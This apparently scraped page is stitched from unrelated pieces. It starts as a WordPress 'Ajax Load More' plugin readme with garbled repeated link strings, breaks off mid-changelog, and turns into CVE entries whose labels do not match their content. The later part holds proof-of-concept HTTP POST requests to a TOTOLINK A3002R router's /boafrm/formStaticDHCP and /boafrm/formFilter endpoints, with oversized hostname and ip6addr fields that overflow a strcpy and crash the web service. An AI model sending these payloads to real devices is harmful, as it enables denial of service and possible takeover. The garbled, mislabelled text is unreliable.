\*\*\[Destroy After\](https://connekthq.com/plugins/ajax-load-more/examples/destroy-after/)\*\* - Remove Ajax Load More functionality after 'n' number of pages. - \*\*\[Event Listing\](https://connekthq.com/plugins/ajax-load-more/examples/event-listing/)\*\* - Ordering and listing events by custom field date. - \*\*\[Filtering\](https://connekthq.com/plugins/ajax-load-more/examples/filtering/)\*\* - Reset and filter an Ajax Load More instance. - \*\*\[Infinite Scroll\](https://connekthq.com/plugins/ajax-load-more/examples/infinite-scroll/)\*\* - A look at the new loading functionality and styles. - \*\*\[Images Loaded\](https://connekthq.com/plugins/ajax-load-more/examples/images-loaded/)\*\* - Download images before displaying ajax loaded content. - \*\*\[Masonry\](https://connekthq.com/plugins/ajax-load-more/examples/masonry/)\*\* - Creating a flexible grid layout with Masonry JS. - \*\*\[Multiple Instances\](https://connekthq.com/plugins/ajax-load-more/examples/multiple-instances/)\*\* - Include multiple Ajax Load More' on a single page. - \*\*\[Paging URLs\](https://connekthq.com/plugins/ajax-load-more/examples/paging-urls/)\*\* - Generate unique paging URLs for every Ajax Load More query with the SEO add-on. - \*\*\[Pause Loading\](https://connekthq.com/plugins/ajax-load-more/examples/pause-loading/)\*\* - Posts will not load until initiated by the user. - \*\*\[Preloaded Posts\](https://connekthq.com/plugins/ajax-load-more/examples/pause-loading/)\*\* - Easily preload an initial set of posts before completing any Ajax requests to the server. - \*\*\[Progress Bar\](https://connekthq.com/plugins/ajax-load-more/examples/progress-bar/)\*\* - Display a progress bar load indicator with each Ajax request. - \*\*\[Search Results\](https://connekthq.com/plugins/ajax-load-more/examples/search-results/)\*\* - Returning results based on search terms. - \*\*\[Scroll Container\](https://connekthq.com/plugins/ajax-load-more/examples/scroll-container/)\*\* - Constrain Ajax Load More to a parent container. - \*\*\[SEO & Paging\](https://connekthq.com/plugins/ajax-load-more/examples/seo-paging-add-ons/)\*\* - Combine these two add-ons to create one powerful navigation system. - \*\*\[Slideshow Gallery\](https://connekthq.com/plugins/ajax-load-more/examples/slideshow-gallery/)\*\* - Create a gallery of posts with Ajax Load More and the Paging add-on. - \*\*\[Table Layout\](https://connekthq.com/plugins/ajax-load-more/examples/table/)\*\* - Ajax Load More will display query results in a table format. → \[See All Examples\](https://connekthq.com/plugins/ajax-load-more/examples/) \*\*Note\*\*: The \[Custom Repeater Add-On\](AllExampleshttpsAllExampleshttpsAllExampleshttpshttps://connekthq.com/plugins/ajax-load-more/custom-repeaters/) has been installed for use on each of our product demos. \[youtube https://www.youtube.com/watch?v=EQ57i6dkOew\] ### Add-ons The following \[add-ons\](https://connekthq.com/plugins/ajax-load-more/add-ons/) are available to increase the functionality of Ajax Load More. - \*\*\[Cache\](https://connekthq.com/plugins/ajax-load-more/add-ons/cache/)\*\*: Improve website performance by caching the results of Ajax server requests. - \*\*\[Call to Actions\](https://connekthq.com/plugins/ajax-load-more/add-ons/call-to-actions/)\*\*: Extend Ajax Load More with advertisement and call to action content blocks. - \*\*\[Comments\](https://connekthq.com/plugins/ajax-load-more/add-ons/comments/)\*\*: Load and display WordPress blog comments using the core Ajax Load More infinite scroll functionality. - \*\*\[Custom Repeaters\](https://connekthq.com/plugins/ajax-load-more/add-ons/custom-repeaters/)\*\*: Create, modify and delete repeater templates as you need them with absolutely zero restrictions. - \*\*\[Elementor\](https://connekthq.com/plugins/ajax-load-more/add-ons/elementor/)\*\*: Add infinite scroll or load more to your Elementor Posts and WooCommerce listing widgets with Ajax Load More and the intuitive Elementor Widget Connector. - \*\*\[Filters\](https://connekthq.com/plugins/ajax-load-more/add-ons/filters/)\*\*: Front-end and admin functionality for creating, managing and displaying Ajax Load More filters. - \*\*\[Layouts\](https://connekthq.com/plugins/ajax-load-more/add-ons/layouts/)\*\*: Predefined responsive layouts for Ajax Load More repeater templates. - \*\*\[Next Page\](https://connekthq.com/plugins/ajax-load-more/add-ons/next-page/)\*\*: Infinite scroll multipage WordPress content with Ajax Load More and the Next Page add-on. - \*\*\[Paging\](https://connekthq.com/plugins/ajax-load-more/add-ons/paging/)\*\*: Replace the default lazy load/infinite scroll functionality of Ajax Load More with a numbered navigation system. - \*\*\[Preloaded\](https://connekthq.com/plugins/ajax-load-more/add-ons/preloaded/)\*\*: Load an initial set of posts before sending any Ajax requests to your server. - \*\*\[SEO\](https://connekthq.com/plugins/ajax-load-more/add-ons/search-engine-optimization/)\*\*: Generate unique paging URLs with each Ajax Load More query. - \*\*\[Single Post\](https://connekthq.com/plugins/ajax-load-more/add-ons/single-post/)\*\*: Enable infinite scrolling of single posts on your WordPress post templates. - \*\*\[Theme Repeaters\](https://connekthq.com/plugins/ajax-load-more/add-ons/theme-repeaters/)\*\*: Manage Ajax Load More repeater templates from within your current theme directory. - \*\*\[Users\](https://connekthq.com/plugins/ajax-load-more/add-ons/users/)\*\*: Lazy loading WordPress Users with Ajax Load More. - \*\*\[WooCommerce\](https://connekthq.com/plugins/ajax-load-more/add-ons/woocommerce/)\*\*: Infinite scroll WooCommerce products with Ajax Load More. ### Extensions The following free \[extensions\](https://connekthq.com/plugins/ajax-load-more/extensions/) are available to provide compatibility with popular WordPress plugins and core features. - \*\*\[Advanced Custom Fields\](https://connekthq.com/plugins/ajax-load-more/extensions/advanced-custom-fields/)\*\*: Display field type data with Ajax Load More. - \*\*\[Relevanssi\](https://connekthq.com/plugins/ajax-load-more/extensions/relevanssi/)\*\*: Display Relevanssi search results with Ajax Load More. - \*\*\[REST API\](https://connekthq.com/plugins/ajax-load-more/extensions/rest-api/)\*\*: Enable compatibility with the WordPress REST API. - \*\*\[SearchWP\](https://connekthq.com/plugins/ajax-load-more/extensions/searchwp/)\*\*: Display SearchWP query results with Ajax Load More. - \*\*\[Term Query\](https://wordpress.org/plugins/ajax-load-more-for-terms/)\*\*: Infinite scroll WordPress Terms. ### Callback Functions Ajax Load More dispatches callbacks during various stages in the plugins lifecycle. Callback functions are dispatched directly from core Ajax Load More or one of the various add-ons. → \[View All Callback Functions\](https://connekthq.com/plugins/ajax-load-more/docs/callback-functions/) ### Filter Hooks Ajax Load More has a variety of WordPress \[filters\](https://connekthq.com/plugins/ajax-load-more/docs/filter-hooks/) in place that enable users to hook into Ajax Load More to insert or modify data. → \[See All Filters\](https://connekthq.com/plugins/ajax-load-more/docs/filter-hooks/) ### Variables Ajax Load More passes the following PHP \*\*\[variables\](https://connekthq.com/plugins/ajax-load-more/docs/variables/)\*\* to each repeater template - these template variables can help you style and transform your repeater templates. - \*\*$alm\_current\*\* - Returns the current item number in the current Ajax Load More loop and will reset to zero with every 'Load More' action. - \*\*$alm\_page\*\* - Returns the current page number. - \*\*$alm\_item\*\* - Returns the current item number within your loop. - \*\*$alm\_found\_posts\*\* - Returns the total number of posts found within the entire WordPress query. ### Plugin Links - \[Official Website\](https://connekthq.com/ajax-load-more/) - \[Documentation\](https://connekthq.com/plugins/ajax-load-more/docs/) - \[Premium Add-ons\](https://connekthq.com/plugins/ajax-load-more/add-ons/) - \[Free Extensions\](https://connekthq.com/plugins/ajax-load-more/extensions/) - \[Github\](https://github.com/dcooney/wordpress-ajax-load-more/) ### Please Review Ajax Load More! Your reviews make a big difference! Please consider taking the time to \[review my plugin\](https://wordpress.org/support/view/plugin-reviews/ajax-load-more). Your ratings and reviews help the plugin grow and provide the motivation needed to keep pushing it forward. → \[Leave a Review\](https://wordpress.org/support/plugin/ajax-load-more/reviews/#new-post) == Frequently Asked Questions == = What are the steps to getting Ajax Load More to display on my website = 1. Create your shortcode 2. Add the shortcode to your page, by adding it through the content editor or placing it directly within one of your template files. 3. Load a page with your shortcode in place and watch Ajax Load More fetch your posts. → \[Read the Implementation Guide\](https://connekthq.com/plugins/ajax-load-more/docs/implementation-guide/) = What are my server requirements? = Your server must be able to read/write/create files. Ajax Load More creates the default repeater on plugin activation and in order to modify the output we are required to write to the file as well. = Is the ajax functionality secure? = Yes, Ajax Load more uses admin-ajax and nonces in order to protect URLs and forms from being misused. = Can I make modifications to the plugin code? = Sure, but please be aware that if modifications are made it may affect future updates of the plugin. = Can I modify the repeater template? = Yes, visit the Repeater Template section in your WordPress admin. = How are my repeater templates saved? = Repeater template data is saved into your WordPress database as well as written directly to a repeater template .php file in the ajax-load-more plugin directory. = Can I use custom fields in a repeater? = Yes, but you will need to define $post at the top of the repeater before requesting your custom fields. Like so: global $post;theImplementationGuidehttpstheImplementationGuidehttpstheImplementationGuidehttpstheImplementationGuidehttpstheImplementationGuidehttpstheImplementationGuidehttpstheImplementationGuidehttpstheImplementationGuidehttpstheImplementationGuidehttpstheImplementationGuidehttpstheImplementationGuidehttps = Which browsers are supported? = - Firefox (Mac, PC, iOS) - Chrome (Mac, PC, iOS, Android) - Safari (Mac, iOS) - Opera - Android - IE11+ = How Can You Contribute? = Issues and pull requests can be submitted via \[GitHub\](https://github.com/dcooney/wordpress-ajax-load-more). --- == Installation == How to install Ajax Load More. = Using The WordPress Dashboard = 1. Navigate to the 'Add New' in the plugins dashboard 2. Search for 'Ajax Load More' 3. Click 'Install Now' 4. Activate the plugin on the Plugin dashboard = Uploading in WordPress Dashboard = 1. Navigate to the 'Add New' in the plugins dashboard 2. Navigate to the 'Upload' area 3. Select \`ajax-load-more.zip\` from your computer 4. Click 'Install Now' 5. Activate the plugin in the Plugin dashboard = Using FTP = 1. Download \`ajax-load-more.zip\` 2. Extract the \`ajax-load-more\` directory to your computer 3. Upload the \`ajax-load-more\` directory to the \`/wp-content/plugins/\` directory 4. Activate the plugin in the Plugin dashboard == Screenshots == 1. Settings screen 2. Available Repeater Templates 3. Custom Repeaters Add-On 4. Shortcode Builder 5. Content Editor shortcode icon 6. Edit Page Shortcode Builder 7. Shortcode and implementation examples == Changelog == = 5.5.4 - August 19, 2022 = \* NEW - Added new core setting for adding custom JavaScript. This new setting will allow for adding callbacks directly from the ALM settings page. \* NEW: Added new \`alm\_seo\_posts\_per\_page\` filter to disable the posts\_per\_page protection in the SEO add-on. \* NEW - Added new \`alm\_canonical\_frontpage\_trailing\_slash\` filter to remove the trailing slash from frontpage URLs. This is useful for add-ons to update the browser URL. \* NEW - Added new \`alm\_allow\_future\_posts\` filter to allow future posts for non-logged in users. \`add\_filter('alm\_allow\_future\_posts', '\_\_return\_true');\` \* NEW - Added new \`alm\_button\_wrap\_classes\` filter to add classes to the button wrapper element. \* UPDATE: Added new \`start\` and \`end\` variables in the \[Results\](https://connekthq.com/plugins/ajax-load-more/docs/results-text) Text feature. This adds support for using Results Text with the Paging Add-on. \* UPDATE: Normalized how the default.php Repeater Template is created on plugin activation. \* FIX - Fixed PHP warnings displayed if ALM was added to a 404 page. \* SECURITY - Fix for potential admin level exploit with Repeater exports. \* SECURITY - Fix for potential admin level exploit with getting taxonomy terms in the Shortcode Builder. \* SECURITY - Fix for potential admin level exploit with getting layout templates in the Repeater Template section of ALM. = 5.5.3 - June 24, 2022 = \* UPDATE: Added support for lazy loading images with Blocksy Pro theme. \* FIX: Fixed issue with potential xs scriptiing issue. \[report\](https://github.com/dcooney/wordpress-ajax-load-more/issues/183) = 5.5.2 - March 7, 2022 = \* NEW: Added \`alm\_ajaxurl\` filter that allows for filtering the admin-ajax URL. \* FIX: Fixed issue with Filters add-on pagination links in \`

CVE-2022-2945

Cross-Site Request Forgery (CSRF) vulnerability in WPdevelop/Oplugins Booking Calendar plugin <= 9.2.1 at WordPress leading to Translations Update.

CVE-2022-33177: Booking Calendar

TOTOLINK A3002R TOTOLINK-A3002R-He-V1.1.1-B20200824.0128 is vulnerable Buffer Overflow via the hostname parameter in binary /bin/boa.

**Firmware:**

TOTOlink A3002R TOTOLINK-A3002R-He-V1.1.1-B20200824.0128

**Detail:**

The hostname parameter in the sub\_416F38 function in binary /bin/boa is copied directly to V28 through strcpy without filtering

The sub\_416f38 function is found to process the data of the fromstaticDHCP interface

Run grep -i 'fromstaticDHCP to find that the front page is tcpip\_staticdhcp.htm

**poc:**

    POST /boafrm/formStaticDHCP HTTP/1.1
    
    Host: 192.168.0.1
    
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0
    
    Accept: */*
    
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    
    Accept-Encoding: gzip, deflate
    
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    
    X-Requested-With: XMLHttpRequest
    
    Content-Length: 3335
    
    Origin: http://192.168.0.1
    
    Connection: close
    
    Referer: http://192.168.0.1/tcpip_staticdhcp.htm
    
    Cookie: xxid=1488794641; uid=nCnNGQTjYe
    
    
    
    static_dhcp=1&ip_addr=192.168.0.2&mac_addr=0016eaae3c40&hostname=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&addRsvIPFlag=1&submit-url=%2Ftcpip_staticdhcp.htm
    
    

The last one is the port scanned before the test, and you can see that the HTTP service crashed after the POC was sent

Then the page still fails to be accessed

CVE-2022-40112: iot/3.md at main · 1759134370/iot

TOTOLINK A3002R TOTOLINK-A3002R-He-V1.1.1-B20200824.0128 is vulnerable to Buffer Overflow via /bin/boa.

The IP6addr parameter in the sub\_41A074 function in binary /bin/boa is copied into the array without filtering through strCPy, causing a buffer overflow vulnerability 

You can see that the program got the value of ip6addr and copied it directly through strcpy

It is found that sub\_41A074 processes the parameters passed by the interface/boAFRM /formFilter

    POST /boafrm/formFilter HTTP/1.1
    
    Host: 192.168.0.1
    
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0
    
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    
    Accept-Encoding: gzip, deflate
    
    Content-Type: application/x-www-form-urlencoded
    
    Content-Length: 4644
    
    Origin: http://192.168.0.1
    
    Connection: close
    
    Referer: http://192.168.0.1/ip6filter.htm
    
    Cookie: xxid=1488794641
    
    Upgrade-Insecure-Requests: 1
    
    
    
    ip=192.168.0.3&enabled=1&ip4=3&ip6addr=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&fromPort=&toPort=&protocol=0&comment=&addFilterIp=%E5%BA%94%E7%94%A8&submit-url=%2Fip6filter.htm

Tag

#firefox